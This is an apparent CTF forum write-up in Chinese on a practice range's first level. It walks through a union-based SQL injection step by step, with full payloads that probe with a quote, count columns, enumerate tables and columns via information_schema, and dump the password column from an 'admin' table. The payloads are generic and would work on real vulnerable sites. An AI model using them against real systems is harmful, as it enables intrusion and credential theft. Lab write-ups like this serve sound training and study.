【蓝胖】靶场第一章小芳的writeup

菜刀也是刀   ·   发表于 2018-7-25   ·   CTF&WP专版

这个猫好可爱啊~  以后我也养一只

天才第一步,判断有没有注入,如下图,加个  ’ 报错

1 and 1=1 正确

猜表长度,最后猜到2正确 order by 

把id设为2,前面出错,猜数据库名 id=2 union select 1,database()   

爆出数据库中所有的表:

/?id=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() 


爆出当前表:id=2 union select 1,table_name from information_schema.tables where table_schema = database() 


这时候有了表名,库名,再去爆出所有列,(*^▽^*)

2 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'admin' 

嘿嘿,有3列,看password列吧

?id=2 union select 2,password from admin 

得到一串神秘的英文单词,居然不是肥猫的名字,算了,去试试是不是秘钥吧!


大家有什么其他方法,欢迎留言讨论~~


打赏我,让我更有动力~

0 Reply   |  Until 2018-7-25 | 548 View
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3